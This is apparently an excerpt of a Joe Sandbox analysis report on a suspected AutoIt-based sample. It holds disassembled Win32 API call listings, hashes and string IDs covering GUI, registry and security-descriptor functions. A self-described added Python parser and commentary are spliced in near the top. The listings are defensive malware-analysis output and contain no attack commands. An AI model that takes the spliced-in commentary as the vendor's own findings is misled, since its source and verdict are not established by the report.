                                                                                                                  • SetErrorMode.KERNEL32(00000000,00B4CB68,?,\\.\,00B4CC08), ref: 00B24D36
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                  • Opcode ID: 69a88f82c0883b35494b0fdd081f78e1c783b91a6263f485f83f785798347e74
                                                                                                                  • Instruction ID: a63b8c332f498feea6bd062facf5f036792786f48f50daddecce3efcad4df4ed
                                                                                                                  • Opcode Fuzzy Hash: 69a88f82c0883b35494b0fdd081f78e1c783b91a6263f485f83f785798347e74
                                                                                                                  • Instruction Fuzzy Hash: 4F61D330605615AFCB15DF28EAC2DAD77F0EB05340B2080E6F81EABAA2DB31DD41DB41
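The per-function "APIs" listings above (the AutoIt splash-window and progress-bar builders, the GetDriveTypeW classifier) are easier to triage once the raw "• Api.MODULE(args), ref: addr" lines are turned into records and the Win32 constants are named. The following is an added example, not code from the Joe Sandbox report or its IDA plugin: a small Python parser whose line grammar is inferred from the lines on this page (a "?" is a value the plugin did not resolve, eight hex digits are a 32-bit stack value, anything else is a string literal) and which decodes only standard Win32 constants (WS_* window styles, WM_SETFONT, STM_SETIMAGE, PBM_SETRANGE, GENERIC_READ, OPEN_EXISTING). The sample lines are copied from this report; the argument positions assume the listing order matches the API's parameter order, which the CreateWindowExW and CreateFileW calls on this page bear out.

```python
"""Parse Joe Sandbox "APIs" listing lines and name the Win32 constants in them.

Added example, not part of the Joe Sandbox report or its IDA plugin.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple

# Constructed sample: eight lines copied from the listings on this page.
SAMPLE = r"""
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32CF8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B32D40
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D62
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B32E30
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B32A31
• GetDriveTypeW.KERNEL32(?,00B4CB68,?,\\.\,00B4CC08), ref: 00B24BCA
• DestroyWindow.USER32 ref: 00B32B52
  • Part of subcall function 00B473E8: GetSysColor.USER32(00000012), ref: 00B47421
"""

# Line grammar inferred from the report: optional subcall prefix, Api.MODULE,
# optional "(args)", then "ref: <hex address>". Header lines do not match.
ENTRY = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Standard Win32 values. WS_CAPTION precedes WS_BORDER/WS_DLGFRAME so the
# combined bits are reported once; the low 16 bits are control-class styles.
WS_FLAGS = [
    (0x80000000, "WS_POPUP"), (0x40000000, "WS_CHILD"), (0x20000000, "WS_MINIMIZE"),
    (0x10000000, "WS_VISIBLE"), (0x08000000, "WS_DISABLED"), (0x04000000, "WS_CLIPSIBLINGS"),
    (0x02000000, "WS_CLIPCHILDREN"), (0x01000000, "WS_MAXIMIZE"), (0x00C00000, "WS_CAPTION"),
    (0x00800000, "WS_BORDER"), (0x00400000, "WS_DLGFRAME"), (0x00200000, "WS_VSCROLL"),
    (0x00100000, "WS_HSCROLL"), (0x00080000, "WS_SYSMENU"), (0x00040000, "WS_THICKFRAME"),
    (0x00020000, "WS_MINIMIZEBOX"), (0x00010000, "WS_MAXIMIZEBOX"),
]
MESSAGES = {0x000E: "WM_GETTEXTLENGTH", 0x0030: "WM_SETFONT", 0x0172: "STM_SETIMAGE",
            0x0401: "PBM_SETRANGE", 0x0404: "PBM_SETSTEP"}
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Any]          # None = unresolved "?", int = 32-bit value, str = literal
    ref: int                 # call-site address from "ref:"
    subcall: Optional[int] = None  # set when the line is "Part of subcall function X"


def parse_arg(tok: str) -> Any:
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX8.match(tok):
        return int(tok, 16)  # "-00000017" parses as -23, as the listing intends
    return tok


def parse_api_listing(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # "APIs", "Strings" and similar header lines
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_window_style(style: int) -> Tuple[List[str], int]:
    """Return (named WS_* flags, control-specific low word) for a dwStyle value."""
    names, rest = [], style & 0xFFFF0000
    for bit, name in WS_FLAGS:
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    return names, style & 0xFFFF


def annotate(call: ApiCall) -> Dict[str, Any]:
    """Name the constants in the calls that define the AutoIt GUI stub's behaviour."""
    a, out = call.args, {}
    if call.api.startswith("CreateWindowEx") and len(a) > 3 and isinstance(a[3], int):
        out["class"] = a[1]                       # lpClassName
        out["style"], out["class_style"] = decode_window_style(a[3])  # dwStyle
    elif call.api.startswith("SendMessage") and len(a) > 3 and isinstance(a[1], int):
        out["message"] = MESSAGES.get(a[1], "0x%04X" % a[1])
        if a[1] == 0x0401 and isinstance(a[3], int):  # PBM_SETRANGE lParam = MAKELPARAM(lo, hi)
            out["range"] = (a[3] & 0xFFFF, (a[3] >> 16) & 0xFFFF)
    elif call.api.startswith("CreateFile") and len(a) > 4 and isinstance(a[1], int) and isinstance(a[4], int):
        out["access"] = [n for bit, n in GENERIC if a[1] & bit]      # dwDesiredAccess
        out["disposition"] = DISPOSITION.get(a[4], hex(a[4]))        # dwCreationDisposition
    return out


def summarize(calls: List[ApiCall]) -> Dict[str, Any]:
    """Per-module counts plus the string literals and subcall targets seen."""
    return {
        "modules": Counter(c.module for c in calls),
        "apis": sorted({c.api for c in calls}),
        "strings": sorted({x for c in calls for x in c.args if isinstance(x, str)}),
        "subcalls": sorted({c.subcall for c in calls if c.subcall is not None}),
    }
```

Two reading caveats the parser makes visible: the listing often shows more values than the API takes (CreateFileW has seven parameters, yet sixteen values are printed, and the trailing ones repeat the preceding CreateWindowExW arguments), so anything past the real arity is stack content at the call site rather than an argument; and the decoded style 0x88C00000 = WS_POPUP | WS_DISABLED | WS_CAPTION on the "AutoIt v3" window, together with PBM_SETRANGE(0, 100) on the msctls_progress32 control, identifies these functions as the interpreter's standard splash and progress windows, not sample-specific logic.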
APIs
• GetSysColor.USER32(00000012), ref: 00B47421
• SetTextColor.GDI32(?,?), ref: 00B47425
• GetSysColorBrush.USER32(0000000F), ref: 00B4743B
• GetSysColor.USER32(0000000F), ref: 00B47446
• CreateSolidBrush.GDI32(?), ref: 00B4744B
• GetSysColor.USER32(00000011), ref: 00B47463
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B47471
• SelectObject.GDI32(?,00000000), ref: 00B47482
• SetBkColor.GDI32(?,00000000), ref: 00B4748B
• SelectObject.GDI32(?,?), ref: 00B47498
• InflateRect.USER32(?,000000FF,000000FF), ref: 00B474B7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B474CE
• GetWindowLongW.USER32(00000000,000000F0), ref: 00B474DB
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B4752A
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B47554
• InflateRect.USER32(?,000000FD,000000FD), ref: 00B47572
• DrawFocusRect.USER32(?,?), ref: 00B4757D
• GetSysColor.USER32(00000011), ref: 00B4758E
• SetTextColor.GDI32(?,00000000), ref: 00B47596
• DrawTextW.USER32(?,00B470F5,000000FF,?,00000000), ref: 00B475A8
• SelectObject.GDI32(?,?), ref: 00B475BF
• DeleteObject.GDI32(?), ref: 00B475CA
• SelectObject.GDI32(?,?), ref: 00B475D0
• DeleteObject.GDI32(?), ref: 00B475D5
• SetTextColor.GDI32(?,?), ref: 00B475DB
• SetBkColor.GDI32(?,?), ref: 00B475E5
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 7b203ab22d9fd00a8d861f104f230bdb7244d91825ab748e5dda49d83e687b0d
• Instruction ID: 9fa062cdff53d55686512ce21435ae2c3fa6669276feeecfde3dc19a15b54e24
• Opcode Fuzzy Hash: 7b203ab22d9fd00a8d861f104f230bdb7244d91825ab748e5dda49d83e687b0d
• Instruction Fuzzy Hash: 3D619A76901218AFDF009FA4DC49EAEBFB9FB09720F114155F911BB2A1DB709A40DF90
APIs
• GetCursorPos.USER32(?), ref: 00B41128
• GetDesktopWindow.USER32 ref: 00B4113D
• GetWindowRect.USER32(00000000), ref: 00B41144
• GetWindowLongW.USER32(?,000000F0), ref: 00B41199
• DestroyWindow.USER32(?), ref: 00B411B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B411ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B4120B
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B4121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00B41232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B41245
• IsWindowVisible.USER32(00000000), ref: 00B412A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B412BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B412D0
• GetWindowRect.USER32(00000000,?), ref: 00B412E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 00B4130E
• GetMonitorInfoW.USER32(00000000,?), ref: 00B41328
• CopyRect.USER32(?,?), ref: 00B4133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00B413AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 3e91838ab177ae9a8475069c7a419fd07954c3993aaa35617e5d11bc37fb798b
• Instruction ID: 88ea4c45949602ff9f9651811258dee732c502b6d85b113ed827d63a87dd7d3c
• Opcode Fuzzy Hash: 3e91838ab177ae9a8475069c7a419fd07954c3993aaa35617e5d11bc37fb798b
• Instruction Fuzzy Hash: DEB1AF71A04341AFD710DF68C984BAEBBE4FF84700F008958F9999B261CB71DD44DB62
APIs
• CharUpperBuffW.USER32(?,?), ref: 00B402E5
• _wcslen.LIBCMT ref: 00B4031F
• _wcslen.LIBCMT ref: 00B40389
• _wcslen.LIBCMT ref: 00B403F1
• _wcslen.LIBCMT ref: 00B40475
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B404C5
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B40504
  • Part of subcall function 00ACF9F2: _wcslen.LIBCMT ref: 00ACF9FD
  • Part of subcall function 00B1223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B12258
  • Part of subcall function 00B1223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B1228A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: e9e942767cb74dcd4604262e5e726b937789332edbda8cbb58a17f58ab25bb7a
• Instruction ID: 9e4182f471af50e514890210712fe708e074e33fea53565233136723c3513c60
• Opcode Fuzzy Hash: e9e942767cb74dcd4604262e5e726b937789332edbda8cbb58a17f58ab25bb7a
• Instruction Fuzzy Hash: 96E1E1312282018FC714EF24C59096AB7E6FFD8314F15899CF9969B3A2DB30EE45DB42
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AC8968
• GetSystemMetrics.USER32(00000007), ref: 00AC8970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AC899B
• GetSystemMetrics.USER32(00000008), ref: 00AC89A3
• GetSystemMetrics.USER32(00000004), ref: 00AC89C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AC89E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AC89F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AC8A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AC8A3C
• GetClientRect.USER32(00000000,000000FF), ref: 00AC8A5A
• GetStockObject.GDI32(00000011), ref: 00AC8A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00AC8A81
  • Part of subcall function 00AC912D: GetCursorPos.USER32(?), ref: 00AC9141
  • Part of subcall function 00AC912D: ScreenToClient.USER32(00000000,?), ref: 00AC915E
  • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000001), ref: 00AC9183
  • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000002), ref: 00AC919D
• SetTimer.USER32(00000000,00000000,00000028,00AC90FC), ref: 00AC8AA8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: aea06f0018f03e56d1d593fcab2860c09f63551b65c77fb2de0b7b8eacf053a5
• Instruction ID: b1de9190a74412c392b2cabcb0de05b7fe0ed4d93de5af4ce0915bc979d48fe3
• Opcode Fuzzy Hash: aea06f0018f03e56d1d593fcab2860c09f63551b65c77fb2de0b7b8eacf053a5
• Instruction Fuzzy Hash: 17B18C35A01209AFDB14DFA8CC46FAE3BB5FB48714F114269FA15AB2A0DB34E941CB51
APIs
  • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B11114
  • Part of subcall function 00B110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11120
  • Part of subcall function 00B110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B1112F
  • Part of subcall function 00B110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11136
  • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B1114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B10DF5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B10E29
• GetLengthSid.ADVAPI32(?), ref: 00B10E40
• GetAce.ADVAPI32(?,00000000,?), ref: 00B10E7A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B10E96
• GetLengthSid.ADVAPI32(?), ref: 00B10EAD
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B10EB5
• HeapAlloc.KERNEL32(00000000), ref: 00B10EBC
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B10EDD
• CopySid.ADVAPI32(00000000), ref: 00B10EE4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B10F13
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B10F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B10F47
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10F6E
• HeapFree.KERNEL32(00000000), ref: 00B10F75
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10F7E
• HeapFree.KERNEL32(00000000), ref: 00B10F85
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10F8E
• HeapFree.KERNEL32(00000000), ref: 00B10F95
• GetProcessHeap.KERNEL32(00000000,?), ref: 00B10FA1
• HeapFree.KERNEL32(00000000), ref: 00B10FA8
  • Part of subcall function 00B11193: GetProcessHeap.KERNEL32(00000008,00B10BB1,?,00000000,?,00B10BB1,?), ref: 00B111A1
  • Part of subcall function 00B11193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B10BB1,?), ref: 00B111A8
  • Part of subcall function 00B11193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B10BB1,?), ref: 00B111B7
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 3dfa5827f1f22dd635d4de4c2b34365f0f280cbe64c138ac1607e66ddd012869
• Instruction ID: 21b619e36c59579fd32980354efc534a9ff5fd48221f5f85b5b781d258aaf6a5
• Opcode Fuzzy Hash: 3dfa5827f1f22dd635d4de4c2b34365f0f280cbe64c138ac1607e66ddd012869
• Instruction Fuzzy Hash: B371AF7290120AEBDF20AFA4DC45FEEBBB8FF06700F144155F958A7290DB709A85CB60
                                                                                                                  APIs
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3C4BD
                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B4CC08,00000000,?,00000000,?,?), ref: 00B3C544
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B3C5A4
                                                                                                                  • _wcslen.LIBCMT ref: 00B3C5F4
                                                                                                                  • _wcslen.LIBCMT ref: 00B3C66F
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B3C6B2
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B3C7C1
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B3C84D
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B3C881
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3C88E
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B3C960
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                  • API String ID: 9721498-966354055
                                                                                                                  • Opcode ID: 53b27f7aaad6a705b2a0c6bdb4558741c8cf9d544e11f65bd8f1ffd7ac08ad89
                                                                                                                  • Instruction ID: 0c22f8ea72d99e5209ae3a8ed59e26912a717cda1158995c84a03e4f5321cf01
                                                                                                                  • Opcode Fuzzy Hash: 53b27f7aaad6a705b2a0c6bdb4558741c8cf9d544e11f65bd8f1ffd7ac08ad89
                                                                                                                  • Instruction Fuzzy Hash: 3B1269352042009FD714DF24C981A6ABBE5FF88714F14899DF89AAB3A2DB31FD41CB91
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B409C6
                                                                                                                  • _wcslen.LIBCMT ref: 00B40A01
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B40A54
                                                                                                                  • _wcslen.LIBCMT ref: 00B40A8A
                                                                                                                  • _wcslen.LIBCMT ref: 00B40B06
                                                                                                                  • _wcslen.LIBCMT ref: 00B40B81
                                                                                                                    • Part of subcall function 00ACF9F2: _wcslen.LIBCMT ref: 00ACF9FD
                                                                                                                    • Part of subcall function 00B12BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B12BFA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                  • API String ID: 1103490817-4258414348
                                                                                                                  • Opcode ID: d62dd70aae74e51a168b75fcfda05d51bcf9f12349c2ad65717ca13595b61c04
                                                                                                                  • Instruction ID: a8dfeb21df55331342e5feefe70e552e412f14c5c0dc400fe2fc7dc043339b6e
                                                                                                                  • Opcode Fuzzy Hash: d62dd70aae74e51a168b75fcfda05d51bcf9f12349c2ad65717ca13595b61c04
                                                                                                                  • Instruction Fuzzy Hash: AAE1AF312183018FC714EF24C59196AB7E1FF98314F1589ADF9AA9B362DB30EE45DB81
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                  • API String ID: 1256254125-909552448
                                                                                                                  • Opcode ID: efe81f874983a8a4e67d778cbc50898bb59414bb0e50f474cb4d5369caa205fc
                                                                                                                  • Instruction ID: dc5e986438594100383b83698f7d7e52ba65f22475e69b90400084d94cdbe87e
                                                                                                                  • Opcode Fuzzy Hash: efe81f874983a8a4e67d778cbc50898bb59414bb0e50f474cb4d5369caa205fc
                                                                                                                  • Instruction Fuzzy Hash: 3871E33360012A8BCB20DEBCCD515BA3BD5EB60754F3545A9F86AB7289FA31CD45C3A0
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B4835A
